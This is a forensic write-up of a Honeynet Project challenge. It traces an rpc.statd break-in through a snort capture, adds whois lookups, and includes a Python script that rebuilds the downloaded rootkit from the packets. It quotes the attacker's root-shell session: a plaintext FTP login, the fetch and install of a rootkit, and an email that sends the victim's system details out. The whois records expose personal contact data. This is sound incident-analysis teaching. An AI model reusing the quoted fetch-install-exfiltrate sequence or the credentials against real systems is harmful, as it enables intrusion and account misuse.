
This is my first attempt at actually submitting an answer to a honeynet challenge.

First I downloaded the snort binary file snort-0315@0005.log.tar.gz.

I extracted the snort binary: gzip -dc snort-0315@0005.log.tar.gz | tar -xof -

I could have extracted the file with: tar -zxvf snort-0315@0005.log.tar.gz

I started ethereal and loaded snort-0315@0005.log.

Knowing that the attackers were using an rpc.statd attack, I typed this filter into ethereal to find all of the IPs that were attempting to exploit rpc.statd: tcp.port eq 111 and ip.addr eq 172.16.1.108

The resulting information showed that 211.185.125.124 had an extended conversation on port 111. There was also a single probe from 203.111.78.182 at 04:53.29.0532 which appears to have been the initial contact from this attacker during a scan sweep. A quick check proved that this was indeed the case by changing the ethereal filter to: ip.addr eq 203.111.78.182

I then switched to a new filter with ethereal: ip.addr eq 211.185.125.124

This allowed me to see all of the packets that were originating from 211.185.125.124.

I noticed that at packet 132 the ports changed. I right clicked on packet 132 and told ethereal to follow this TCP stream. This showed me that the attacker had opened a root shell on port 39168 and allowed me to see what their script was doing.

cd /; uname -a; id;
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
ftp -v ftp.home.ro
Connected to ftp.home.ro.
220-
220-
220-                           H O M E  .  R  O
220-
220-                 This server is for HOME.RO members only.
220-                  Go to http://www.home.ro/ to register.
220-
220-                      No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
soane
Name (ftp.home.ro:root): 331 Password required for soane.
Password:i2ttgcj1d
230 User soane logged in.
get lk.tgz
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
200 PORT command successful.
150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
226 Transfer complete.
bye
520333 bytes received in 35.5 secs (14 Kbytes/sec)
421 Idle Timeout (240 seconds): closing control connection.
tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
cd last
./install
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************

Are Make !
Are Gcc !
Nu Are Ssh !
* Inlocuim nestat ... alea alea * Gata...
* Dev...

* Gata
* Facem Director...Si Mutam Alea..
* Copiem ssh si alea

* Adaugam In Startup:) ...
* Luam Informatiile dorite ...
* Gata ! Trimitem Mailul ...Asteapta Te Rog
* Am trimis mailul ... stergem fisierele care nu mai trebuie .

* G A T A *

* That Was Nice Last

I then searched for the ftp data by changing my ethereal filter to: ip.addr eq 172.16.1.108 and tcp.port eq 21

This showed me that there was an outgoing ftp connection made to 193.231.236.41. Now I knew where the rootkit was downloaded from. To verify this, I changed the ethereal filter to: ip.addr eq 193.231.236.41

This proved that the rootkit was indeed downloaded from 193.231.236.41. I now had the initial information needed to start answering the honeynet challenge questions.



1. The attackers used rpc.statd attack to get into the system. What modifications did they make to the break in process to both automate and make the process faster?

They had the exploit open up a root shell on port 39168. Their script then automatically ftp'ed the lk.tgz file from 193.231.236.41 (home.ro) using the userid of soane and a password of i2ttgcj1d. After the download completed, the script ran tar -zxvf lk.tgz. The script then automatically ran the install program, which sent this email to bidi_damm@yahoo.com to confirm that the system was exploited:

bidi_damm@yahoo.com
Received: (from root@localhost)
    by asdf1 (8.9.3/8.9.3) id TAA00952
    for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root <root@asdf1>
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig :           inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
          inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
* Uptime :   7:45pm  up  8:23,  0 users,  load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id    : GenuineIntel
* Cpu Model : model        : 4
model name    : Pentium MMX
* Cpu Speed: cpu MHz        : 200.457171
* Bogomips: bogomips    : 399.77
* Spatiu Liber: Filesystem            Size  Used Avail Use% Mounted on
        /dev/hda8             251M   33M  205M  14% /
        /dev/hda1              23M  2.4M   19M  11% /boot
        /dev/hda6             1.6G  2.1M  1.5G   0% /home
        /dev/hda5             1.6G  367M  1.2G  23% /usr
        /dev/hda7             251M  5.3M  232M   2% /var
.
250 ok dirdel
QUIT
221 mta502.mail.yahoo.com



2. What system/country did the badguys come in from?

They came in from 211.185.125.124 which is the Kyongsan Purim Elementary School in Korea.

[jim@localhost honeynet]$ fwhois 211.185.125.124@whois.arin.net
[whois.arin.net]
Asia Pacific Network Information Center (NETBLK-APNIC-CIDR-BLK)
   These addresses have been further assigned to Asia-Pacific users.
   Contact info can be found in the APNIC database,
   at WHOIS.APNIC.NET or http://www.apnic.net/
   Please do not send spam complaints to APNIC.
   AU

   Netname: APNIC-CIDR-BLK2
   Netblock: 210.0.0.0 - 211.255.255.255

   Coordinator:
      Administrator, System  (SA90-ARIN)  [No mailbox]
      +61-7-3367-0490

   Domain System inverse mapping provided by:

   NS.APNIC.NET            203.37.255.97
   SVC00.APNIC.NET        202.12.28.131
   NS.TELSTRA.NET        203.50.0.137
   NS.RIPE.NET            193.0.0.193

   Regional Internet Registry for the Asia-Pacific Region.
  
   *** Use whois -h whois.apnic.net <object>                     ***
 
   *** or see http://www.apnic.net/db/ for database assistance   ***
  

   Record last updated on 03-May-2000.
   Database last updated on 3-Sep-2001 23:06:38 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

This record points me towards whois at apnic.net, so I then queried them for the IP information.

[jim@localhost honeynet]$ fwhois 211.185.125.124@whois.apnic.net
[whois.apnic.net]

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum:     211.172.0.0 - 211.199.255.255
netname:     KRNIC-KR
descr:       KRNIC
descr:       Korea Network Information Center
country:     KR
admin-c:     HM127-AP
tech-c:      HM127-AP
remarks:     ******************************************
remarks:     KRNIC is the National Internet Registry
remarks:     in Korea under APNIC. If you would like to
remarks:     find assignment information in detail
remarks:     please refer to the KRNIC Whois DB
remarks:     http://whois.nic.or.kr/english/index.html
remarks:     ******************************************
mnt-by:      APNIC-HM
mnt-lower:   MNT-KRNIC-AP
changed:     hostmaster@apnic.net 20000607
changed:     hostmaster@apnic.net 20010606
source:      APNIC

person:      Host Master
address:     Korea Network Information Center
address:     Narajongkeum B/D 14F, 1328-3, Seocho-dong, Seocho-ku, Seoul, 137-070, Republic of Korea
country:     KR
phone:       +82-2-2186-4500
fax-no:      +82-2-2186-4496
e-mail:      hostmaster@nic.or.kr
nic-hdl:     HM127-AP
mnt-by:      MNT-KRNIC-AP
changed:     hostmaster@nic.or.kr 20010514
source:      APNIC

The record at apnic pointed towards more information being available at whois.nic.or.kr.

[jim@localhost honeynet]$ fwhois 211.185.125.124@whois.nic.or.kr
[whois.nic.or.kr]
# ENGLISH

IP Address         : 211.185.125.0-211.185.125.127
Network Name       : KSPURIM-E
Connect ISP Name   : PUBNET
Connect Date       : 20001120
Registration Date  : 20001129

[ Organization Information ]
Orgnization ID     : ORG147082
Org Name           : Kyongsan Purim Elementary School
State              : KYONGBUK
Address            : 171 puki-1ry jinrang-eup kyongsan-ci
Zip Code           : 712-830

[ Admin Contact Information]
Name               : DAEDUN KYUN
Org Name           : Kyongsan Purim Elementary School
State              : KYONGBUK
Address            : 171 puki-1ry jinrang-eup kyongsan-ci
Zip Code           : 712-830
Phone              : +82-53-851-9523
Fax                : +82-53-851-9522
E-Mail             : gum@hanmail.net

[ Technical Contact Information ]
Name               : DAEDUN KYUN
Org Name           : Kyongsan Purim Elementary School
State              : KYONGBUK
Address            : 171 puki-1ry jinrang-eup kyongsan-ci
Zip Code           : 712-830
Phone              : +82-53-851-9523
Fax                : +82-53-851-9522
E-Mail             : gum@hanmail.net

However, the initial probe came from 203.111.78.182, which turns out to be a site in Australia:

[jim@localhost september]$ fwhois 203.111.78.182@whois.apnic.net
[whois.apnic.net]

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum:     203.111.0.0 - 203.111.127.255
netname:     DAVNET
descr:       Davnet Telecommunications
descr:       Level 7, 209 Castlereagh Street
descr:       Sydney NSW 2000
country:     AU
admin-c:     DR15-AP
tech-c:      DR15-AP
notify:      routemaster@magna.com.au
mnt-by:      APNIC-HM
mnt-lower:   MAINT-AU-DAVNET
changed:     em@magna.com.au 20001018
source:      APNIC

person:      DavTel Routemaster
address:     209 Castlereagh St
address:     Sydney  NSW  2000
address:     -
address:     Spam & Abuse : abuse@davnet.com.au
country:     AU
phone:       +61-2-9272-9600
fax-no:      +61-2-9272-9664
e-mail:      routemaster@davnet.com.au
nic-hdl:     DR15-AP
mnt-by:      MAINT-AU-DAVNET
changed:     emilia.lambros@davnet.com.au 20010219
source:      APNIC


3. What nationality are the badguys, and how were you able to determine this?

I believe they were Romanian because the site that they downloaded the rootkit from is 193.231.236.41, which is www.home.ro, and parts of the installation text appear to be in Romanian. www.home.ro only allows members to access their website; however, they may have exploited that system too.

[jim@localhost honeynet]$ fwhois 193.231.236.41@whois.arin.net
[whois.arin.net]
European Regional Internet Registry/RIPE NCC (NETBLK-RIPE)
   These addresses have been further assigned to European users.
   Contact info can be found in the RIPE database, via the
   WHOIS and TELNET servers at whois.ripe.net, and at
   http://www.ripe.net/db/whois.html
   NL

   Netname: RIPE-CBLK
   Netblock: 193.0.0.0 - 193.255.255.255
   Maintainer: RIPE

   Coordinator:
      Reseaux IP European Network Co-ordination Centre Singel 258  (RIPE-NCC-ARIN)  nicdb@RIPE.NET
      +31 20 535 4444

   Domain System inverse mapping provided by:

   NS.RIPE.NET            193.0.0.193
   NS.EU.NET            192.16.202.11
   AUTH03.NS.UU.NET        198.6.1.83
   NS2.NIC.FR            192.93.0.4
   SUNIC.SUNET.SE        192.36.125.2
   MUNNARI.OZ.AU        128.250.1.21
   NS.APNIC.NET            203.37.255.97

   To search on arbitrary strings, see the Database page on
   the RIPE NCC web-site at http://www.ripe.net/db/

   Record last updated on 16-Oct-1998.
   Database last updated on 3-Sep-2001 23:06:38 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

The information at arin.net pointed me towards ripe.net for more information.

[jim@localhost honeynet]$ fwhois 193.231.236.41@whois.ripe.net
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:      193.231.236.0 - 193.231.236.255
netname:      RDSNET
descr:        Romania Data Systems
country:      RO
admin-c:      RDSH1-RIPE
tech-c:       RDSH1-RIPE
rev-srv:      ns1.rdsnet.ro 193.231.236.17
rev-srv:      ns2.rdsnet.ro 193.231.236.10
status:       ASSIGNED PA
remarks:      object maintained by ro.rnc local registry
notify:       domain-admin@rnc.ro
notify:       as-admin@rdsnet.ro
mnt-by:       AS3233-MNT
changed:      danacorb@sunu.rnc.ro 19971217
changed:      estaicut@rnc.ro 19981123
changed:      cristih@rnc.ro 20000816
changed:      cristih@rnc.ro 20010215
source:       RIPE

route:        193.231.224.0/20
descr:        RDSNET
origin:       AS8708
mnt-by:       AS8708-MNT
changed:      tim@rdsnet.ro 20010320
source:       RIPE

person:       RDS Hostmaster
address:      Romania Data Systems
address:      Str. Sf. Vineri Nr. 25
address:      Bl. 105C, Sector 3
address:      Bucharest / ROMANIA
phone:        +40 1 301 08 88
fax-no:       +40 1 301 08 51
e-mail:       hostmaster@rdsnet.ro
nic-hdl:      RDSH1-RIPE
remarks:      Hostmaster team:
remarks:      Cornel Ciocirlan - CC79-RIPE
remarks:      Andrei Stirbu - AS1385-RIPE
remarks:      Adrian Niculae Gabriel - NAG4-RIPE
remarks:      Dragos Vilceanu - DV461-RIPE
remarks:      Bogdan Surdu - BS747-RIPE
notify:       hostmaster@rdsnet.ro
mnt-by:       AS8708-MNT
changed:      tim@rdsnet.ro 20000424
source:       RIPE


4. What do the answers to questions #1 and #2 tell us about the tactics the badguys are using?

They are becoming more sophisticated and are automating their tools. This is making it more difficult to prosecute them, because the attacks cross international borders. The problem is truly international in scope. Just because we see the actual IP that is doing the probing/exploiting does not necessarily mean that this is where the prober is from or where the actual attack will come from. The initial probe from Australia proves this point.

5. What did you learn from this challenge?

I learned that the attackers are initially gathering a list of exploitable systems that they would return to at a later time and/or date. The attack does not necessarily come from the system that does the initial probe, so blocking an IP address based on a probe does not protect you from being attacked. It also shows that it does not take an attacker long to exploit and clean up after themselves.


6. How long did this challenge take you?

2.0 hours

.5 hours to do my initial search through the snort binary log file.
.5 hours to answer questions 1 through 6

.5 hours to find a way to extract lk.tgz
.5 hours to do the writeup.

Bonus Question:
Can you recover the blackhat's rootkit from the Snort binary log file? If so, how?

Yes.

Instructions for recovering the rootkit from the Snort binary log file using ethereal:

Using Ethereal, my tool of choice, load the snort dump file into memory but tell it not to enable name resolution.

[jim@localhost honeynet]$ ethereal&

Load in the snort binary data snort-0315@0005.log


Type this filter in: ip.addr eq 193.231.236.41

Move your cursor down to the first line that says ftp-data, this should be packet 280.

Right click on this packet and say "Follow TCP Stream".

This will bring up a screen that has the title of "Contents of TCP Stream".

Click on the button that says "Save as".

Save the file out as "lk.tgz".

Close the "Contents of tcp stream" window.

Close the ethereal window.


At the command line type: tar -zxvf lk.tgz

Alternatively you can use this command: gzip -dc lk.tgz | tar -xof -

Ignore the errors that occur; they are caused by the trailing packets at the end of the file.

After you extract the files, you will have a directory called "last"; inside this directory you will find the contents of the rootkit. These files can be verified against the first TCP stream that we followed, which showed what the attackers' automated script was doing.

tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
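The "Follow TCP Stream" recovery above, done programmatically as an added example that is not part of the original writeup: it walks a libpcap file (the format of the snort binary log), keeps only the segments the FTP server 193.231.236.41 sent to the honeypot 172.16.1.108 on the data channel, orders them by sequence number and discards retransmitted bytes, so the carved file is exactly the bytes the server sent. The capture is constructed inline; the two addresses are the writeup's, everything else (ports, sequence numbers, the stand-in archive) is made up for the test.

```python
import gzip
import struct
SERVER, CLIENT = "193.231.236.41", "172.16.1.108"   # FTP server and honeypot, from the writeup

def ipv4(a):
    return bytes(int(x) for x in a.split("."))

def tcp_frame(src, dst, sport, dport, seq, payload):
    """Ethernet/IPv4/TCP frame with zeroed checksums (enough for a parser test)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, ipv4(src), ipv4(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp

def pcap_bytes(frames):
    """Classic libpcap file (magic 0xA1B2C3D4, link type 1 = Ethernet); constructed test data."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f   # ts_sec, ts_usec, caplen, len
    return out

def reassemble(pcap, src_ip, src_port, dst_ip):
    """One direction of a TCP stream, ordered by sequence number, retransmitted bytes dropped."""
    segs, off = {}, 24                                  # 24 = size of the pcap global header
    while off + 16 <= len(pcap):
        caplen = struct.unpack_from("<IIII", pcap, off)[2]
        frame, off = pcap[off + 16:off + 16 + caplen], off + 16 + caplen
        if (len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6
                or frame[26:30] != ipv4(src_ip) or frame[30:34] != ipv4(dst_ip)):
            continue                                    # not IPv4/TCP from src_ip to dst_ip
        tcp = frame[14 + (frame[14] & 0x0F) * 4:14 + struct.unpack_from("!H", frame, 16)[0]]
        sport, _, seq = struct.unpack_from("!HHI", tcp, 0)
        data = tcp[(tcp[12] >> 4) * 4:]
        if sport == src_port and data:
            segs.setdefault(seq, data)                  # first copy of a segment wins
    buf, nxt = b"", None
    for seq in sorted(segs):
        data = segs[seq]
        if nxt is not None and seq < nxt:
            data = data[nxt - seq:]                     # overlaps bytes already delivered
        buf += data
        nxt = seq + len(segs[seq]) if nxt is None else max(nxt, seq + len(segs[seq]))
    return buf

def sample_pcap():
    """Stand-in lk.tgz as ftp-data segments: out of order, one retransmitted, plus noise."""
    archive = gzip.compress(b"last/install\nlast/linsniffer\nlast/cleaner\n" * 20)
    n = len(archive) // 3
    c1, c2, c3 = archive[:n], archive[n:2 * n], archive[2 * n:]
    frames = [tcp_frame(SERVER, CLIENT, 20, 1234, 5000, c1),
              tcp_frame(CLIENT, SERVER, 1234, 20, 9000, b""),             # client ACK, no data
              tcp_frame(SERVER, CLIENT, 20, 1234, 5000 + 2 * n, c3),      # c3 arrives before c2
              tcp_frame(SERVER, CLIENT, 21, 1235, 7000, b"226 Transfer complete.\r\n"),
              tcp_frame(SERVER, CLIENT, 20, 1234, 5000 + n, c2),
              tcp_frame(SERVER, CLIENT, 20, 1234, 5000, c1)]              # retransmitted c1
    return pcap_bytes(frames), archive
```

Against the real snort-0315@0005.log, read the file into pcap and write reassemble(pcap, SERVER, 20, CLIENT) out as lk.tgz; the session used PORT (active mode), so the data connection comes from the server's port 20.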

I want to thank the people involved in the HoneyNet Project for posting these challenges. It allows me and others to learn how to react to and analyze an exploit in a controlled environment. It also allows us to learn more advanced methods from experienced administrators.